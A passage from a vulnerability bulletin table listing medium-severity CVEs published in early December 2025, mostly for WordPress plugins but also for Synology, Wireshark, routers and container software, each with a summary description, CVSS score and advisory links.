| Sprecher Automation--SPRECON-E-C | Insufficient encryption strength in Sprecher Automation SPRECON-E-C, SPRECON-E-P, and SPRECON-E-T3 allows a local unprivileged attacker to extract data from update images and thus obtain limited information about the architecture and internal processes. | 2025-12-02 | 4 | CVE-2025-41743 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based SQL Injection via the "getTermsForAjax" function in all versions up to, and including, 3.40.1. This is due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database granted they have metabox access for the taxonomy (enabled by default for contributors). | 2025-12-03 | 6.5 | CVE-2025-13359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9bebdc0-1625-4dc4-8c92-37f379868cd5?source=cve https://github.com/TaxoPress/TaxoPress/commit/1097a22181aa10ce55cc9cd5fa8495f7494e18ea |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques. | 2025-12-06 | 6.5 | CVE-2025-13922 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f40cc632-c6af-4c8b-a455-76319f7fe151?source=cve https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/inc/class.admin.php#L1406 https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L180 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3408243%40simple-tags%2Ftrunk&old=3388829%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=#file17 |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.40.1. This is due to the plugin not properly verifying that a user is authorized to perform an action in the "taxopress_merge_terms_batch" function. This makes it possible for authenticated attackers, with subscriber level access and above, to merge or delete arbitrary taxonomy terms. | 2025-12-03 | 4.3 | CVE-2025-13354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/05c1ee52-02c9-440b-9269-14ea8b73be45?source=cve https://github.com/TaxoPress/TaxoPress/commit/5eb2cee861ebd109152eea968aca0259c078c8b0 |
| sumotto--CSV Sumotto | The CSV Sumotto plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6aa8089-1c29-41ef-b2c0-06841751f7a5?source=cve https://plugins.trac.wordpress.org/browser/csv-sumotto/trunk/csv_sumotto_settings.php#L53 |
| Sunbird--DCIM dcTrack | DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host. | 2025-12-04 | 6.7 | CVE-2025-66237 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json |
| switch2mac--WP-SOS-Donate Donation Sidebar Plugin | The WP-SOS-Donate Donation Sidebar Plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13625 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5123c672-e769-4d44-9912-e159d3e186c1?source=cve https://wordpress.org/plugins/wp-sos-donate/ https://plugins.trac.wordpress.org/browser/wp-sos-donate/trunk/wp-sos-donate_options.php#L45 https://plugins.trac.wordpress.org/browser/wp-sos-donate/tags/0.9.2/wp-sos-donate_options.php#L45 |
| sylabs--singularity | SingularityCE and SingularityPRO are open source container platforms. Prior to SingularityCE 4.3.5 and SingularityPRO 4.1.11 and 4.3.5, if a user relies on LSM restrictions to prevent malicious operations then, under certain circumstances, an attacker can redirect the LSM label write operation so that it is ineffective. The attacker must cause the user to run a malicious container image that redirects the mount of /proc to the destination of a shared mount, either known to be configured on the target system, or that will be specified by the user when running the container. The attacker must also control the content of the shared mount, for example through another malicious container which also binds it, or as a user with relevant permissions on the host system it is bound from. This vulnerability is fixed in SingularityCE 4.3.5 and SingularityPRO 4.1.11 and 4.3.5. | 2025-12-02 | 4.5 | CVE-2025-64750 | https://github.com/sylabs/singularity/security/advisories/GHSA-wwrx-w7c9-rf87 https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm https://github.com/sylabs/singularity/pull/3850 https://github.com/sylabs/singularity/commit/27882963879a7af1699fd6511c3f5f1371d80f33 https://github.com/sylabs/singularity/commit/5af3e790c40593591dfc26d0692e4d4b21c29ba0 https://github.com/advisories/GHSA-fh74-hm69-rqjw |
| Synaptics--Synaptics Fingerprint Driver | A carefully crafted DLL, copied to C:\ProgramData\Synaptics folder, allows a local user to execute arbitrary code with elevated privileges during driver installation. | 2025-12-01 | 6.6 | CVE-2025-11772 | https://www.synaptics.com/sites/default/files/2025-12/fingerprint-driver-co-installer-security-brief-2025-12-01.pdf |
| Synology--BeeDrive for desktop | Origin validation error vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.3-13973 allows local users to write arbitrary files with non-sensitive information via unspecified vectors. | 2025-12-04 | 5.6 | CVE-2025-8074 | Synology-SA-25:09 BeeDrive for desktop |
| Synology--DiskStation Manager (DSM) | Improper control of dynamically-managed code resources vulnerability in WebAPI component in Synology DiskStation Manager (DSM) before 7.1.1-42962-8 and 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote authenticated users to obtain privileges without consent via unspecified vectors. | 2025-12-04 | 4.3 | CVE-2024-5401 | Synology-SA-24:27 DSM |
| Synology--Synology Mail Server | A vulnerability in Synology Mail Server allows remote authenticated attackers to read and write non-sensitive settings, and disable some non-critical functions. | 2025-12-04 | 6.3 | CVE-2025-2848 | Synology-SA-25:05 Mail Server |
| Synology--Synology Router Manager (SRM) | A vulnerability in FileStation thumb cgi allows remote authenticated users to read/write image files. | 2025-12-04 | 5.4 | CVE-2025-29843 | Synology-SA-25:04 SRM |
| Synology--Synology Router Manager (SRM) | A vulnerability in FileStation file cgi allows remote authenticated users to read file metadata and path information. | 2025-12-04 | 4.3 | CVE-2025-29844 | Synology-SA-25:04 SRM |
| Synology--Synology Router Manager (SRM) | A vulnerability in VideoPlayer2 subtitle cgi allows remote authenticated users to read .srt files. | 2025-12-04 | 4.3 | CVE-2025-29845 | Synology-SA-25:04 SRM |
| takeads--Takeads | The Takeads plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.0.13. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete the plugin's configuration options. | 2025-12-05 | 4.3 | CVE-2025-12370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f3619d9-7572-439e-a284-d59ef5de08f3?source=cve https://plugins.trac.wordpress.org/browser/monetize-link/tags/1.0.13/src/MLP_Ajax.php#L8 |
| teamdream--dream gallery | The dream gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'dreampluginsmain' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13621 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cdf6ba0-2866-4347-8518-bb1d2e40bab3?source=cve https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L254 https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L257 https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/templates/front.php#L38 https://plugins.trac.wordpress.org/browser/dream-gallery/trunk/dreamgallery.php#L254 |
| techjewel--Fluent Booking The Ultimate Appointments Scheduling, Events Booking, Events Calendar Solution | The Fluent Booking plugin for WordPress is vulnerable to unauthorized calendar import and management due to a missing capability check on the "importCalendar" function in all versions up to, and including, 1.9.11. This makes it possible for authenticated attackers, with subscriber level access and above, to import arbitrary calendars and manage them. | 2025-12-03 | 4.3 | CVE-2025-13756 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7860dfa8-de76-4ca3-bd80-98550afab56b?source=cve https://plugins.trac.wordpress.org/changeset/3404176/fluent-booking/tags/1.10.0/app/Hooks/Handlers/DataImporter.php |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms - Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.1.7 via the 'submission_id' parameter due to missing validation on a user controlled key within the confirmScaPayment() function. This makes it possible for unauthenticated attackers to mark arbitrary submissions as failed via crafted requests to the endpoint granted they can guess or enumerate a valid submission identifier. | 2025-12-06 | 5.3 | CVE-2025-13748 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c2aee799-4e4c-4a41-8b76-e2ad576fe2e2?source=cve https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php |
| Tekrom Technology Inc.--T-Soft E-Commerce | Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery.This issue affects T-Soft E-Commerce: through 28112025. | 2025-12-01 | 5.4 | CVE-2025-13296 | https://www.usom.gov.tr/bildirim/tr-25-0421 |
| themeisle--Visualizer: Tables and Charts Manager for WordPress | The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability. | 2025-12-02 | 6.5 | CVE-2025-12483 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94392c66-6e50-48bb-93cb-9aa9d0229761?source=cve https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Gutenberg/Block.php#L499 https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Source/Query.php#L173 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3405160%40visualizer%2Ftrunk&old=3355840%40visualizer%2Ftrunk&sfp_email=&sfph_mail= |
| torod--Torod The smart shipping and delivery portal for e-shops and retailers | The Torod - The smart shipping and delivery portal for e-shops and retailers plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9. This is due to missing or incorrect nonce validation on the save_settings function. This makes it possible for unauthenticated attackers to modify plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12373 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1eedab61-e94b-4793-8bf6-cfadd94a5778?source=cve https://plugins.trac.wordpress.org/browser/torod/tags/1.9/inc/torod_Settings.php#L80 |
| TOZED--ZLT M30S | A vulnerability was determined in TOZED ZLT M30S and ZLT M30S PRO 1.47/3.09.06. This impacts an unknown function of the file /reqproc/proc_post of the component Web Interface. Executing manipulation of the argument goformId with the input REBOOT_DEVICE can lead to denial of service. The attack can only be done within the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.3 | CVE-2025-14105 | VDB-334487 | TOZED ZLT M30S/ZLT M30S PRO Web proc_post denial of service VDB-334487 | CTI Indicators (IOB, IOC, IOA) Submit #696740 | ZLT M30S & M30S PRO MTNNGRM30S_1.47, M30SPRO_3.09.06 (Other versions might be vulnerable) Denial of Service https://youtu.be/RNgsrnPPxgQ |
| tunilame--CSS3 Buttons | The CSS3 Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13907 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f71ffb-f09c-40f6-b65e-af30ce155466?source=cve https://plugins.trac.wordpress.org/browser/css3-buttons/trunk/css3-buttons.php#L59 https://plugins.trac.wordpress.org/browser/css3-buttons/tags/0.1/css3-buttons.php#L59 |
| Tyche Softwares--Arconix Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tyche Softwares Arconix Shortcodes allows Stored XSS.This issue affects Arconix Shortcodes: from n/a through 2.1.19. | 2025-12-01 | 6.5 | CVE-2025-13835 | https://vdp.patchstack.com/database/wordpress/plugin/arconix-shortcodes/vulnerability/wordpress-arconix-shortcodes-plugin-2-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TykoDev--cherry-studio-TykoFork | A vulnerability has been found in TykoDev cherry-studio-TykoFork 0.1. This issue affects the function redirectToAuthorization of the file /.well-known/oauth-authorization-server of the component OAuth Server Discovery. Such manipulation of the argument authorizationUrl leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-07 | 6.3 | CVE-2025-14204 | VDB-334647 | TykoDev cherry-studio-TykoFork OAuth Server Discovery oauth-authorization-server redirectToAuthorization os command injection VDB-334647 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700182 | GitHub cherry-studio-TykoFork 0.0.1 OS Command Injection https://lavender-bicycle-a5a.notion.site/TokyoTech-RCE-26153a41781f80b6a370d427a6d307f0 |
| UTT-- 520W | A vulnerability was detected in UTT è¿›å– 520W 1.7.7-180627. The affected element is the function strcpy of the file /goform/websHostFilter. Performing manipulation of the argument addHostFilter results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 6.5 | CVE-2025-14140 | VDB-334528 | UTT è¿›å– 520W websHostFilter strcpy buffer overflow VDB-334528 | CTI Indicators (IOB, IOC, IOA) Submit #698521 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/12.md https://github.com/cymiao1978/cve/blob/main/new/12.md#poc |
| UTT-- 520W | A security vulnerability has been detected in UTT è¿›å– 520W 1.7.7-180627. Impacted is the function strcpy of the file /goform/formConfigDnsFilterGlobal. Such manipulation of the argument timeRangeName leads to buffer overflow. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 5.7 | CVE-2025-14139 | VDB-334527 | UTT è¿›å– 520W formConfigDnsFilterGlobal strcpy buffer overflow VDB-334527 | CTI Indicators (IOB, IOC, IOA) Submit #698520 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/11.md https://github.com/cymiao1978/cve/blob/main/new/11.md#poc |
| Verysync-- | A flaw has been found in Verysync 微力åŒæ¥ up to 2.21.3. This impacts an unknown function of the file /rest/f/api/resources/f96956469e7be39d/tmp/text.txt?override=false of the component Web Administration Module. Executing manipulation can lead to unrestricted upload. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14199 | VDB-334619 | Verysync 微力åŒæ¥ Web Administration text.txt unrestricted upload VDB-334619 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699539 | Beijing Weili Digital Technology Co., Ltd 微力åŒæ¥ v2.21.3 Upload Any File https://github.com/jjjjj-zr/jjjjjzr/issues/10 |
| Verysync-- | A security vulnerability has been detected in Verysync 微力åŒæ¥ up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 5.3 | CVE-2025-14197 | VDB-334617 | Verysync 微力åŒæ¥ Web Administration f96956469e7be39d information disclosure VDB-334617 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699498 | Beijing Weili Digital Technology Co., Ltd 微力åŒæ¥ v2.21.3 Unauthorized Access Submit #699537 | Beijing Weili Digital Technology Co., Ltd 微力åŒæ¥ v2.21.3 Arbitrary File Read (Duplicate) https://github.com/jjjjj-zr/jjjjjzr/issues/6 https://github.com/jjjjj-zr/jjjjjzr/issues/8 |
| Verysync-- | A vulnerability was detected in Verysync 微力åŒæ¥ 2.21.3. This affects an unknown function of the file /safebrowsing/clientreport/download?key=dummytoken of the component Web Administration Module. Performing manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 5.3 | CVE-2025-14198 | VDB-334618 | Verysync 微力åŒæ¥ Web Administration download information disclosure VDB-334618 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699533 | Beijing Weili Digital Technology Co., Ltd 微力åŒæ¥ v2.21.3 Download any file https://github.com/jjjjj-zr/jjjjjzr/issues/7 |
| voidek--Voidek Employee Portal | The Voidek Employee Portal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.6. This makes it possible for unauthenticated attackers to perform several actions like registering an account, deleting users, and modifying details within the employee portal. | 2025-12-05 | 5.3 | CVE-2025-12093 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d33b83d5-cfc0-48b6-a54e-1ae8ac52aae1?source=cve https://wordpress.org/plugins/voidek-employee-portal/ |
| watchful--Backup, Restore and Migrate your sites with XCloner | The Backup, Restore and Migrate your sites with XCloner plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.2. This is due to missing or incorrect nonce validation on the Xcloner_Remote_Storage:save() function. This makes it possible for unauthenticated attackers to add or modify an FTP backup configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows an attacker to set an attacker-controlled FTP site for backup storage and exfiltrate potentially sensitive site data. | 2025-12-05 | 4.3 | CVE-2025-11759 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a76a8e36-635a-48a3-8683-c24a0395212e?source=cve https://plugins.trac.wordpress.org/changeset/3398881/xcloner-backup-and-restore |
| wcvendors--WC Vendors WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors | The WC Vendors - WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.4. This is due to missing or incorrect nonce validation on the /vendor_dashboard/product/delete/ endpoint. This makes it possible for unauthenticated attackers to delete vendor products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12130 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1ed77cf-2595-477a-af86-25c917817984?source=cve https://plugins.trac.wordpress.org/changeset/3408849/wc-vendors/trunk/classes/front/class-wcv-product-controller.php |
| webdevstudios--Custom Post Type UI | The Custom Post Type UI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.18.0. This is due to the plugin not verifying that a user has the required capability to perform actions in the "cptui_process_post_type" function. This makes it possible for authenticated attackers, with subscriber level access and above, to add, edit, or delete custom post types in limited situations. | 2025-12-04 | 4.8 | CVE-2025-12826 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90d203b1-9426-4eff-b566-02c8a1c6adfa?source=cve https://github.com/WebDevStudios/custom-post-type-ui/commit/215779a5ac0c624f0dcf875e87305b4898d5bcf9 |
| webradykal--Easy Jump Links Menus | The Easy Jump Links Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `h_tags` parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13860 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e88dc0-4798-4da8-87cf-4c398acc622c?source=cve https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/trunk/easy-jump-links-menus.php#L52 https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/tags/1.0.0/easy-jump-links-menus.php#L52 |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.1.14. This is due to the plugin not properly verifying that a user is authorized to perform an action in the create_item_permissions_check function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global plugin settings. | 2025-12-06 | 5.4 | CVE-2025-12505 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3ec54ec6-0ff1-4290-85d0-d691a1832627?source=cve https://github.com/weDevsOfficial/wedocs-plugin/blob/develop/includes/API/SettingsApi.php https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L115 https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L179 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3403375%40wedocs%2Ftrunk&old=3382516%40wedocs%2Ftrunk&sfp_email=&sfph_mail= |
| Wireshark Foundation--Wireshark | HTTP3 dissector crash in Wireshark 4.6.0 and 4.6.1 allows denial of service | 2025-12-03 | 5.5 | CVE-2025-13945 | https://www.wireshark.org/security/wnpa-sec-2025-07.html GitLab Issue #20860 |
| Wireshark Foundation--Wireshark | MEGACO dissector infinite loop in Wireshark 4.6.0 to 4.6.1 and 4.4.0 to 4.4.11 allows denial of service | 2025-12-03 | 5.5 | CVE-2025-13946 | https://www.wireshark.org/security/wnpa-sec-2025-08.html GitLab Issue #20884 |
| wpblockart--BlockArt Blocks Gutenberg Blocks, Page Builder Blocks ,WordPress Block Plugin, Sections & Template Library | The BlockArt Blocks - Gutenberg Blocks, Page Builder Blocks ,WordPress Block Plugin, Sections & Template Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'timestamp' attribute in all versions up to, and including, 2.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 6.4 | CVE-2025-13697 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b91364fa-7046-427f-84ee-6a36d49bb80f?source=cve https://plugins.trac.wordpress.org/changeset/3404884/ |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'bookingcalendar' shortcode in all versions up to, and including, 10.14.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12804 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad993a62-457a-494f-a7c8-256b808d18c0?source=cve https://plugins.trac.wordpress.org/changeset/3391614/booking |
| wpdiscover--Social Feed Gallery Portfolio | The Social Feed Gallery Portfolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [igp-wp] shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13896 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2a275deb-a0e3-491a-bed6-9f6112918061?source=cve https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/trunk/includes/public/class-portfolio-shortcode.php#L58 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/tags/1.3/includes/public/class-portfolio-shortcode.php#L58 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/trunk/includes/public/class-portfolio-shortcode.php#L208 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/tags/1.3/includes/public/class-portfolio-shortcode.php#L208 |
| wpeka-club--SurveyFunnel Survey Plugin for WordPress | The SurveyFunnel - Survey Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'surveyfunnel_lite_survey' shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12417 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d13aadf-c144-4919-9bbd-54cb26cf2527?source=cve https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/public/class-surveyfunnel-lite-public.php#L240 https://developer.wordpress.org/apis/security/escaping/ |
| wpeka-club--SurveyFunnel Survey Plugin for WordPress | The SurveyFunnel - Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses. | 2025-12-05 | 5.3 | CVE-2025-13006 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f43f69f0-6995-4789-acf3-8019227effe1?source=cve https://github.com/wpeka/surveyfunnel-lite/blob/master/includes/class-surveyfunnel-lite-rest-api.php https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/includes/class-surveyfunnel-lite-rest-api.php |
| wpforchurch--Sermon Manager | The Sermon Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `sermon-views` shortcode in all versions up to, and including, 2.30.0. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12368 | https://www.wordfence.com/threat-intel/vulnerabilities/id/41116b52-8f94-4d29-8845-a27bdf817b43?source=cve https://wordpress.org/plugins/sermon-manager-for-wordpress https://plugins.trac.wordpress.org/browser/sermon-manager-for-wordpress/tags/2.30.0/includes/vendor/entry-views.php#L114 |
| wpmanageninja--FluentCart A New Era of eCommerce Faster, Lighter, and Simpler | The FluentCart plugin for WordPress is vulnerable to SQL Injection via the 'groupKey' parameter in all versions up to, and including, 1.3.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-03 | 4.9 | CVE-2025-13495 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2000b23f-d8a2-4b83-9bf7-b90cb16718f3?source=cve https://plugins.trac.wordpress.org/browser/fluent-cart/trunk/app/Services/Report/RevenueReportService.php#L76 https://plugins.trac.wordpress.org/browser/fluent-cart/tags/1.3.0/app/Services/Report/RevenueReportService.php#L76 https://plugins.trac.wordpress.org/changeset/3408039/fluent-cart/tags/1.3.2/app/Services/Report/ReportHelper.php |
| xbenx--WP Landing Page | The WP Landing Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the 'wplp_api_update_text' function. This makes it possible for unauthenticated attackers to update arbitrary post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-06 | 4.3 | CVE-2025-13629 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8576b-e6ad-4e0a-b99f-948ba36f53ff?source=cve https://plugins.trac.wordpress.org/browser/wp-landing-page/trunk/includes/wplp-api.php#L14 https://plugins.trac.wordpress.org/browser/wp-landing-page/tags/0.9.3/includes/wplp-api.php#L14 |
